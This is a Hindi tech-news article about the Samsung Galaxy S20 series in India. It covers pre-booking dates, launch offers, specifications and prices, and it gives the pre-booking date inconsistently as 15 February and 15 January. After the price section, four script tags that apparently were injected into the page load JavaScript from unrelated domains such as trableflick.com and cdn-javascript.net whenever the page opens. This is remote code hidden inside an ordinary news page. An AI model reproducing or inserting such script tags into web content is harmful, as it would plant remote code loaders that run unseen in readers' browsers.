Categories: ऑटो & टेक

सैमसंग गैलेक्सी S20, S20+ और S20 अलट्रा की भारत में आज से प्री-बुकिंग शुरू

<p>सैमसंग गैलेक्सी S20, गैलेक्सी&nbsp; S20+ और गैलेक्सी&nbsp; S20 अलट्रा स्मार्टफोन की भारत में भी कीमत सामने आ गई है। साथ ही ग्राहक इन तीनों फ्लैगशिप फोन को आज यानी 15 फऱवरी दोपहर 12 बजे से प्री-बुकिंग शुरू ह गई है। सैमसंग इंडिया ने कीमत और उपलब्धता की जानकरी एक आधिकारिक प्रैस रिलीज के जरिए दी है। सैमसंग ने इस सीरीज को प्री-बुक कराने वाले ग्राहकों के लिए कुछ ऑफर्स की घोषणा भी की है।</p>

<p>सैमसंग गैलेक्सी एस20 सीरीज के तीनों ही फोन की मुख्य हाइलाइट 120 हर्ट्ज़ रिफ्रेश रेट डिस्प्ले, बेहतर कैमरे, 8K वीडियो रिकॉर्डिंग सपोर्ट, बड़ी बैटरी आदि है। सीरीज का हाई-एंड मॉडल गैलेक्सी एस20 अल्ट्रा सबसे दमदार फोन है। इसमें 108 मेगापिक्सल मेन सेंसर वाला रियर कैमरा सेटअप, 40 मेगापिक्सल सेल्फी कैमरा और 45 वॉट फास्ट चार्जिंग सपोर्ट दिया गया है। यदि आप भी गैलेक्सी&nbsp; S20 सीरिज को खरीदने के इच्छुक हैं तो नीचे दी गई जानकारी आपके काम आ सकती है। यहां हम आपको इस सीरीज की भारत में कीमत, सेल ऑफर्स और स्पेसिफिकेशन की जानकारी बता रहे हैं।</p>

<p><span style=”color:#c0392b”><strong>&nbsp;सैमसंग गैलेक्सी S20, गैलेक्सी&nbsp; S20+, गैलेक्सी S20 अलट्रा की प्री बुकिंग और सेल ऑफर्स</strong></span></p>

<p>सैमसंग गैलेक्सी S20, गैलेक्सी S20+ और गैलेक्सी S20 Ultra की प्री-बुकिंग आज यानी 15 जनवरी दोपहर 12 बजे से शुरू हो जाएगी। ग्राहक इन तीनों गैलेक्सी फोन को सैमसंग की आधिकारिक वेबसाइट से बुक करा सकते हैं। कंपनी का दावा है कि फोन को प्री-बुक कराने वाले ग्राहकों को गैलेक्सी S20 6 मार्च 2020 से मिलना शुरू हो जाएगा।</p>

<p>सैमसंग ने इस सीरीज को बुक कराने वाले ग्राहकों के लिए कुछ ऑफर्स भी पेश किए हैं। गैलेक्सी S20 को प्री-बुक कराने वाले ग्राहकों को गैलेक्सी Buds+ ट्रू वायरलेस ईयरबड्स 2,999 रुपये में खरीदने का मौका मिलेगा और साथ ही सैमसंग केयर+ का सब्सक्रिप्शन 1,999 रुपये में दिया जाएगा। इसी तरह गैलेक्सी S20+ और गैलेक्सी S20 अलट्रा को प्री-बुक करने वाले ग्राहक गैलेक्सी बड्स+ ट्रू वायरलेस ईयरबड्स और सैमसंग केयर+ सब्सक्रिप्शन को 1,999 रुपये में खरीद सकेंगे।</p>

<p>बता दें कि Samsung Care+ एक तरह का एक्सिडेंटल और लिक्विड डेमेट प्रोटेक्शन प्लान है, जो फोन क्षतिग्रस्त होने पर यूज़र को रिपेयरिंग पर होने वाले खर्चे से बचाता है। यह सब्सक्रिप्शन एक साल के लिए मान्य होगा। इसके अलावा एयरटेल, जियो और वोडाफोन आइडिया ग्राहकों के लिए भी सैमसंग ने ऑफर्स पेश किया है। इनमें डबल डाटा फायदा और 1 साल की अनलिमिटेड सर्विस आदि फायदे शामिल हैं।</p>

<p><span style=”color:#e74c3c”><strong>सैमसंग गैलेक्सी S20 स्पेसिफिकेशन</strong></span></p>

<p>सैमसंग गैलेक्सी एस20 का डाइमेंशन 151.7×69.1×7.9 मिलीमीटर है और वज़न 163 ग्राम। इसमें 6.2 इंच का इनफिनिटी ओ डायनमिक एमोलेड 2X डिस्प्ले है। स्क्रीन क्वाडएचडी (1,440×3,200 पिक्सल) रिजॉल्यूशन और 563 पीपीआई पिक्सल डेनसिटी के साथ आता है। स्क्रीन HDR10 सर्टिफाइड है और इसमें 120 हर्ट्ज़ रिफ्रेश रेट है। फोन में 7nm ऑक्टा-कोर प्रोसेसर है। चुनिंदा क्षेत्र में यह फोन सैमसंग एक्सीनॉस 990 प्रोसेसर के साथ आएगा और चुनिंदा मार्केट में क्वालकॉम स्नैपड्रैगन 865 प्रोसेसर मॉडल उपलब्ध कराया जाएगा।</p>

<p>गैलेक्सी एस20 में 8 जीबी या 12 जीबी रैम के विकल्प हैं। स्टोरेज 128 जीबी है। ज़रूरत पड़ने पर 1 टीबी तक का माइक्रोएसडी कार्ड इस्तेमाल करना भी संभव है। आपको बायोमैट्रिक ऑथेंटिकेशन के लिए अल्ट्रासोनिक इन-डिस्प्ले फिंगरप्रिंट सेंसर और फेस रिकग्निशन भी मिलेगा। गैलेक्सी एस20 को IP68 का सर्टिफिकेशन मिला हुआ है। यह 25 वॉट फास्ट चार्जिंग (रिटेल बॉक्स में), फास्ट वायरलेस चार्जिंग 2.0 और रिवर्स वायरलेस चार्जिंग को सपोर्ट करता है।</p>

<p>कैमरा डिपार्टमेंट में बड़ा अपग्रेड है। गैलेक्सी एस20 में तीन रियर कैमरे होंगे। यहां 12 मेगापिक्सल का वाइड-एंगल सेंसर है जो एफ/1.8 अपर्चर वाला है। इसके अलावा एफ/ 2.2 अपर्चर वाला अल्ट्रा-वाइड एंगल लेंस दिया गया है। तीसरा सेंसर 64 मेगापिक्सल का है। इस टेलीफोटो कैमरा का अपर्चर एफ/ 2.0 है और यह पीडीएएफ व ऑप्टिकल इमेज स्टेबलाइज़ेशन को सपोर्ट करता है। सेल्फी कैमरा में एफ/ 2.2 अपर्चर वाला 10 मेगापिक्सल का सेंसर है।<br />
फोन एंड्रॉयड 10 पर आधारित One UI 2.1, डुअल-बैंड वाई-फाई 6, ब्लूटूथ 5, एनएफसी, स्टीरियो स्पीकर्स और डॉल्बी एटमस साउंड के साथ आएगा।<br />
&nbsp;<br />
<span style=”color:#e67e22″><strong>सैमसंग गैलेक्सी S20 + स्पेसिफिकेशन</strong></span></p>

<p>सैमसंग गैलेक्सी एस20+ में बहुत कुछ सैमसंग गैलेक्सी एस20 जैसा ही है। अंतर साइज़, बैटरी क्षमता और एक अतिरिक्त रियर कैमरे का है। गैलेक्सी एस20+ का डाइमेंशन 161.9×73.7×7.8 मिलीमीटर है और वज़न 186 ग्राम है। इसका 5जी वेरिएंट 188 ग्राम का है। फोन में 4,500 एमएएच की बैटरी दी गई है। एलटीई वर्ज़न में 8 जीबी रैम के साथ 128 जीबी स्टोरेज है, जबकि 5जी वेरिएंट में 12 जीबी रैम के साथ स्टोरेज में 128 जीबी, 256 जीबी और 512 जीबी के विकल्प होंगे। फ्रंट और रियर कैमरे के सेंसर्स में कोई बदलाव नहीं है। सिर्फ पिछले हिस्से पर एक डेप्थ कैमरा अतिरिक्त है। सैमसंग गैलेक्सी एस20+ में 6.7 इंच का क्वाड-एचडी (1,440×3,200 पिक्सल) डायनमिक एमोलेड 2X डिस्प्ले मिलेगा। इसमें इनफिनिटी ओ होल-पंच है।<br />
&nbsp;<br />
<span style=”color:#8e44ad”><strong>सैमसंग गैलेक्सी S20 अलट्रा स्पेसिफिकेशन</strong></span></p>

<p>अब बात सैमसंग की इस फ्लैगशिप सीरीज़ के सबसे प्रीमियम फोन की। सैमसंग गैलेक्सी एस20 अल्ट्रा में 6.9 इंच का क्वाड-एचडी डायनमिक एमोलेड 2X डिस्प्ले है। गैलेक्सी एस20 अल्ट्रा में रैम के दो विकल्प हैं- 12 जीबी या 16 जीबी। एलटीई और 5जी वेरिएंट में इनबिल्ट स्टोरेज के तीन विकल्प रहेंगे- 128 जीबी, 256 जीबी और 512 जीबी। बैटरी क्षमता 5,000 एमएएच कर दी गई है। गैलेक्सी एस20 अलट्रा 45 वॉट फास्ट चार्जिंग को सपोर्ट करता है।</p>

<p>सैमसंग गैलेक्सी एस20 अल्ट्रा का डाइमेंशन 166.9x76x8.8 मिलीमीटर है और वज़न 220 ग्राम। 5जी वेरिएंट 222 ग्राम का है। बाकी दो मॉडल की तुलना में कुछ कैमरा सेंसर्स अपग्रेड किए गए हैं। वाइड एंगल और डेप्थ कैमरे के अलावा आपको 108 मेगापिक्सल का प्राइमरी कैमरा और 48 मेगापिक्सल का टेलीफोटो कैमरा मिलेगा। गैलेक्सी एस20 अल्ट्रा में नया पेरीस्कोप जैसा टेलीफोटो लेंस दिया गया है। सेल्फी की जिम्मेदारी एफ/ 2.2 अपर्चर वाले 40 मेगापिक्सल सेंसर पर है।</p>

<p><span style=”color:#27ae60″><strong>भारत में सैमसंग गैलेक्सी S20, गैलेक्सी&nbsp; S20+, गैलेक्सी S20 अलट्रा की कीमत</strong></span></p>

<p>सैमसंग गैलेक्सी एस20, गैलेक्सी एस20+ और गैलेक्सी एस20 अल्ट्रा की भारत में कीमत 66,999 रुपये से शुरू होगी और 92,999 तक जाएगी। गैलेक्सी एस20 की भारत में कीमत 66,999 रुपये से शुरू होगी। गैलेक्सी एस20+ की भारत में कीमत 73,999 रुपये से शुरू होगी और सीरीज का सबसे महंगा मॉडल गैलेक्सी एस20 अल्ट्रा होगा, जिसकी कीमत 92,999 रुपये से शुरू होगी।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1581750447391″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

Survey: लेनदेन शुल्क लगा तो UPIका इस्तेमाल बंद कर देगे 75% उपयोगकर्ता

  New Delhi:लोकलसर्किल्स ने रविवार को एक सर्वेक्षण निष्कर्ष निकाला है। जिसमें दावा किया गया…

4 mins ago

शिमला का चिट्टा किंगपिन महात्‍मा पुलिस शिकंजे में, संपत्ति होगी जब्त

    Shimla: हिमाचल की राजधानी शिमला में चिट्टा तस्‍करों का नेक्‍सस चला रहे किंगपिन…

30 mins ago

मोदी-बाइडेन वार्ता में उभरे सामरिक संबंध, कई प्रमुख मुद्दों पर मंथन

  समाचार फर्स्‍ट एजेंसी Modi America visit: प्रधानमंत्री नरेंद्र मोदी ने अमेरिकी राष्ट्रपति जो बाइडेन…

3 hours ago

बिजली के करंट के साथ अब बढ़ेगा पानी का बिल, ग्रामीण इलाकों पर असर

  पहली अक्तूबर से बढ़ेगा रेट,प्रति कनेक्शन प्रतिमाह कटेगा बिल 20 किलो लीटर तक पानी…

3 hours ago

जानें कैसे रहेगा रविवार का राशिफल

  मेष🐐 (चू, चे, चो, ला, ली, लू, ले, लो, अ) आज आपको कोई शुभ…

4 hours ago

Himachal: भाजपा विधायक बिक्रम सिंह ने लौटाई एमएचए की सिक्योरिटी

  धर्मशाला:जसवां प्रागपुर से भाजपा विधायक बिक्रम सिंह ने एमएचए की सिक्योरिटी लौटा दी है।…

17 hours ago